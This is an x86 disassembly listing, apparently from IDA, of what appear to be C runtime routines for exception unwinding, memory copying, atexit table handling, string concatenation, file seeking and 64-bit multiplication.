xchg eax, [esp-8+arg_4]
jmp eax
sub_41D29E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D2A5 proc near ; CODE XREF: sub_422B62+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41D2A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2AC proc near ; CODE XREF: sub_41D45E+5C�p
; sub_4229B1:loc_4229E2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_41D2D4
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_426356 ; RtlUnwind
loc_41D2D4: ; DATA XREF: sub_41D2AC+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_41D2AC endp
; ---------------------------------------------------------------------------
loc_41D2FB: ; CODE XREF: .text:00426AAC�j
; .text:00426AC9�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_4225B6
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D331 proc near ; CODE XREF: sub_422A2C+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_41D385
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_422DB0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_41D331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D385 proc near ; DATA XREF: sub_41D331+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_4225B6
add esp, 20h
pop ebp
retn
sub_41D385 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D3AA proc near ; CODE XREF: sub_4227F8+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_41D45E
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_41D430
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_4DBE70
pop ecx
pop ecx
and [ebp+var_34], 0
loc_41D430: ; DATA XREF: sub_41D3AA+3C�o
cmp [ebp+var_4], 0
jz short loc_41D44D
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_41D456
; ---------------------------------------------------------------------------
loc_41D44D: ; CODE XREF: sub_41D3AA+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_41D456: ; CODE XREF: sub_41D3AA+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_41D3AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D45E proc near ; DATA XREF: sub_41D3AA+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_41D481
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41D4CE
; ---------------------------------------------------------------------------
loc_41D481: ; CODE XREF: sub_41D45E+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_4225B6
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41D4BF
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41D2AC
loc_41D4BF: ; CODE XREF: sub_41D45E+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41D4CE: ; CODE XREF: sub_41D45E+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41D45E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D4D3 proc near ; CODE XREF: sub_422651+C6�p
; sub_4227F8+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_41D52A
loc_41D4F1: ; CODE XREF: sub_41D4D3+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_41D4FB
call sub_422E52
loc_41D4FB: ; CODE XREF: sub_41D4D3+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_41D510
cmp ecx, [eax+8]
jle short loc_41D515
loc_41D510: ; CODE XREF: sub_41D4D3+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_41D521
loc_41D515: ; CODE XREF: sub_41D4D3+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_41D521: ; CODE XREF: sub_41D4D3+40�j
cmp [ebp+arg_4], 0
jge short loc_41D4F1
mov eax, [ebp+var_4]
loc_41D52A: ; CODE XREF: sub_41D4D3+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_41D53E
cmp esi, eax
jbe short loc_41D543
loc_41D53E: ; CODE XREF: sub_41D4D3+65�j
call sub_422E52
loc_41D543: ; CODE XREF: sub_41D4D3+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_41D4D3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D550 proc near ; CODE XREF: sub_423CC0+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_41D568
push [ebp+arg_0]
call sub_426356 ; RtlUnwind
loc_41D568: ; DATA XREF: sub_41D550+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D550 endp
; =============== S U B R O U T I N E =======================================
sub_41D570 proc near ; DATA XREF: sub_41D592+A�o
; sub_41D5FA+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_41D591
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_41D591: ; CODE XREF: sub_41D570+10�j
retn
sub_41D570 endp
; =============== S U B R O U T I N E =======================================
sub_41D592 proc near ; CODE XREF: sub_422AD2+D�p
; sub_423CC0+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_41D570
push large dword ptr fs:0
mov large fs:0, esp
loc_41D5AF: ; CODE XREF: sub_41D592:loc_41D5EA�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41D5EC
cmp esi, [esp+1Ch+arg_4]
jz short loc_41D5EC
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41D5EA
push 101h
mov eax, [ebx+esi*4+8]
call sub_41D626
call dword ptr [ebx+esi*4+8]
loc_41D5EA: ; CODE XREF: sub_41D592+44�j
jmp short loc_41D5AF
; ---------------------------------------------------------------------------
loc_41D5EC: ; CODE XREF: sub_41D592+2A�j
; sub_41D592+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41D592 endp
; =============== S U B R O U T I N E =======================================
sub_41D5FA proc near ; CODE XREF: sub_422AF2+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_41D570
jnz short locret_41D61C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41D61C
mov eax, 1
locret_41D61C: ; CODE XREF: sub_41D5FA+10�j
; sub_41D5FA+1B�j
retn
sub_41D5FA endp
; =============== S U B R O U T I N E =======================================
sub_41D61D proc near ; CODE XREF: sub_422DB0+1E�p
; sub_422DB0+40�p
push ebx
push ecx
mov ebx, offset dword_43AE2C
jmp short loc_41D630
sub_41D61D endp
; =============== S U B R O U T I N E =======================================
sub_41D626 proc near ; CODE XREF: sub_41D592+4F�p
; sub_423CC0+78�p
push ebx
push ecx
mov ebx, offset dword_43AE2C
mov ecx, [ebp+8]
loc_41D630: ; CODE XREF: sub_41D61D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_41D626 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41D640 proc near ; CODE XREF: sub_40D340+5�p
; sub_40D4E2+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_41D640 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D65F proc near ; CODE XREF: sub_40D977+26�p
; sub_4260E2+10�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41BA91
pop ecx
retn
sub_41D65F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D670 proc near ; CODE XREF: sub_40D9E8+3A�p
; sub_41E742+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41D690
cmp edi, eax
jb loc_41D808
loc_41D690: ; CODE XREF: sub_41D670+16�j
test edi, 3
jnz short loc_41D6AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D6CC
rep movsd
jmp ds:off_41D7B8[edx*4]
; ---------------------------------------------------------------------------
loc_41D6AC: ; CODE XREF: sub_41D670+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41D6C4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41D6CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D6C4: ; CODE XREF: sub_41D670+46�j
jmp dword ptr ds:loc_41D7C8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D6CC: ; CODE XREF: sub_41D670+31�j
; sub_41D670+8E�j ...
jmp ds:off_41D74C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41D6E0
dd offset loc_41D70C
dd offset loc_41D730
; ---------------------------------------------------------------------------
loc_41D6E0: ; DATA XREF: sub_41D670+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41D6CC
rep movsd
jmp ds:off_41D7B8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D70C: ; DATA XREF: sub_41D670+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41D6CC
rep movsd
jmp ds:off_41D7B8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D730: ; DATA XREF: sub_41D670+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41D6CC
rep movsd
jmp ds:off_41D7B8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D74C dd offset loc_41D7AF ; DATA XREF: sub_41D670:loc_41D6CC�r
dd offset loc_41D79C
dd offset loc_41D794
dd offset loc_41D78C
dd offset loc_41D784
dd offset loc_41D77C
dd offset loc_41D774
dd offset loc_41D76C
; ---------------------------------------------------------------------------
loc_41D76C: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41D774: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41D77C: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41D784: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41D78C: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41D794: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41D79C: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D7AF: ; CODE XREF: sub_41D670:loc_41D6CC�j
; DATA XREF: sub_41D670:off_41D74C�o
jmp ds:off_41D7B8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D7B8 dd offset loc_41D7C8 ; DATA XREF: sub_41D670+35�r
; sub_41D670+92�r ...
dd offset loc_41D7D0
dd offset loc_41D7DC
dd offset loc_41D7F0
; ---------------------------------------------------------------------------
loc_41D7C8: ; CODE XREF: sub_41D670+35�j
; sub_41D670+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D7D0: ; CODE XREF: sub_41D670+35�j
; sub_41D670+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D7DC: ; CODE XREF: sub_41D670+35�j
; sub_41D670+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D7F0: ; CODE XREF: sub_41D670+35�j
; sub_41D670+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D808: ; CODE XREF: sub_41D670+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41D83C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D830
std
rep movsd
cld
jmp ds:off_41D950[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_41D830: ; CODE XREF: sub_41D670+1B1�j
; sub_41D670+208�j ...
neg ecx
jmp ds:off_41D900[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D83C: ; CODE XREF: sub_41D670+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_41D854
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_41D854+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D854: ; CODE XREF: sub_41D670+1D6�j
; DATA XREF: sub_41D670+1DD�r
jmp ds:off_41D950[ecx*4]
; ---------------------------------------------------------------------------
align 4
push 880041D8h
fadd dword ptr [ecx+0]
mov al, 0D8h
inc ecx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_41D830
std
rep movsd
cld
jmp ds:off_41D950[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_41D830
std
rep movsd
cld
jmp ds:off_41D950[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_41D830
std
rep movsd
cld
jmp ds:off_41D950[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41D904
dd offset loc_41D90C
dd offset loc_41D914
dd offset loc_41D91C
dd offset loc_41D924
dd offset loc_41D92C
dd offset loc_41D934
off_41D900 dd offset loc_41D947 ; DATA XREF: sub_41D670+1C2�r
; ---------------------------------------------------------------------------
loc_41D904: ; DATA XREF: sub_41D670+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41D90C: ; DATA XREF: sub_41D670+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41D914: ; DATA XREF: sub_41D670+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41D91C: ; DATA XREF: sub_41D670+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41D924: ; DATA XREF: sub_41D670+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41D92C: ; DATA XREF: sub_41D670+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41D934: ; DATA XREF: sub_41D670+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D947: ; CODE XREF: sub_41D670+1C2�j
; DATA XREF: sub_41D670:off_41D900�o
jmp ds:off_41D950[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41D950 dd offset loc_41D960 ; DATA XREF: sub_41D670+1B7�r
; sub_41D670:loc_41D854�r ...
dd offset loc_41D968
dd offset loc_41D978
dd offset loc_41D98C
; ---------------------------------------------------------------------------
loc_41D960: ; CODE XREF: sub_41D670+1B7�j
; sub_41D670:loc_41D854�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D968: ; CODE XREF: sub_41D670+1B7�j
; sub_41D670:loc_41D854�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D978: ; CODE XREF: sub_41D670+1B7�j
; sub_41D670:loc_41D854�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D98C: ; CODE XREF: sub_41D670+1B7�j
; sub_41D670:loc_41D854�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41D670 endp
; =============== S U B R O U T I N E =======================================
sub_41D9A5 proc near ; CODE XREF: sub_40DA4F+34�p
; sub_40DA4F+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_41BEC7
pop ecx
pop ecx
retn
sub_41D9A5 endp
; =============== S U B R O U T I N E =======================================
sub_41D9B3 proc near ; CODE XREF: sub_41DA20+4�p
arg_0 = dword ptr 4
push esi
push dword_4DD39C
call sub_422EA8
mov edx, dword_4DD39C
pop ecx
mov ecx, dword_4DD398
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_41DA12
push edx
call sub_422EA8
add eax, 10h
push eax
push dword_4DD39C
call sub_41BBE2
add esp, 0Ch
test eax, eax
jnz short loc_41D9F5
retn
; ---------------------------------------------------------------------------
loc_41D9F5: ; CODE XREF: sub_41D9B3+3F�j
mov ecx, dword_4DD398
sub ecx, dword_4DD39C
mov dword_4DD39C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_4DD398, ecx
loc_41DA12: ; CODE XREF: sub_41D9B3+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add dword_4DD398, 4
retn
sub_41D9B3 endp
; =============== S U B R O U T I N E =======================================
sub_41DA20 proc near ; CODE XREF: sub_40DB3C+1A�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41D9B3
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_41DA20 endp
; =============== S U B R O U T I N E =======================================
sub_41DA32 proc near ; DATA XREF: .data:00429018�o
push 80h
call sub_41BEB5
test eax, eax
pop ecx
mov dword_4DD39C, eax
jnz short loc_41DA53
push 18h
call sub_41E2C9
mov eax, dword_4DD39C
pop ecx
loc_41DA53: ; CODE XREF: sub_41DA32+12�j
and dword ptr [eax], 0
mov eax, dword_4DD39C
mov dword_4DD398, eax
retn
sub_41DA32 endp
; =============== S U B R O U T I N E =======================================
sub_41DA61 proc near ; CODE XREF: sub_40DB5E+7A�p
; sub_40DB5E+8A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_41DA75
loc_41DA6D: ; CODE XREF: sub_41DA61+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_41DA6D
loc_41DA75: ; CODE XREF: sub_41DA61+A�j
mov edx, [esp+arg_4]
push esi
loc_41DA7A: ; CODE XREF: sub_41DA61+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_41DA7A
pop esi
retn
sub_41DA61 endp
; =============== S U B R O U T I N E =======================================
sub_41DA8B proc near ; CODE XREF: sub_412197+26E�p
; sub_412197+365�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41DB07
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_41DAAA
cmp edi, 1
jz short loc_41DAAA
cmp edi, 2
jnz short loc_41DB07
loc_41DAAA: ; CODE XREF: sub_41DA8B+13�j
; sub_41DA8B+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_41DAC1
push esi
call sub_422FA3
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_41DAC1: ; CODE XREF: sub_41DA8B+27�j
push esi
call sub_41E42B
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_41DAD6
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_41DAEA
; ---------------------------------------------------------------------------
loc_41DAD6: ; CODE XREF: sub_41DA8B+42�j
test al, 1
jz short loc_41DAEA
test al, 8
jz short loc_41DAEA
test ah, 4
jnz short loc_41DAEA
mov dword ptr [esi+18h], 200h
loc_41DAEA: ; CODE XREF: sub_41DA8B+49�j
; sub_41DA8B+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_422F09
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_41DB14
; ---------------------------------------------------------------------------
loc_41DB07: ; CODE XREF: sub_41DA8B+B�j
; sub_41DA8B+1D�j
mov dword_4DBDDC, 16h
or eax, 0FFFFFFFFh
loc_41DB14: ; CODE XREF: sub_41DA8B+7A�j
pop edi
pop esi
retn
sub_41DA8B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41DB20 proc near ; CODE XREF: sub_413694+19E�p
; sub_4143F7+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_41DB39
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_41DB39: ; CODE XREF: sub_41DB20+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_41DB20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB54 proc near ; CODE XREF: sub_416563+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_41DB78
xor eax, eax
jmp loc_41DC45
; ---------------------------------------------------------------------------
loc_41DB78: ; CODE XREF: sub_41DB54+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41DB8B
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41DB92
; ---------------------------------------------------------------------------
loc_41DB8B: ; CODE XREF: sub_41DB54+2D�j
mov [ebp+arg_C], 1000h
loc_41DB92: ; CODE XREF: sub_41DB54+35�j
; sub_41DB54+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_41DBC6
mov eax, [esi+4]
test eax, eax
jz short loc_41DBC6
cmp ebx, eax
mov edi, ebx
jb short loc_41DBAC
mov edi, eax
loc_41DBAC: ; CODE XREF: sub_41DB54+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_41CD20
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_41DC0C
; ---------------------------------------------------------------------------
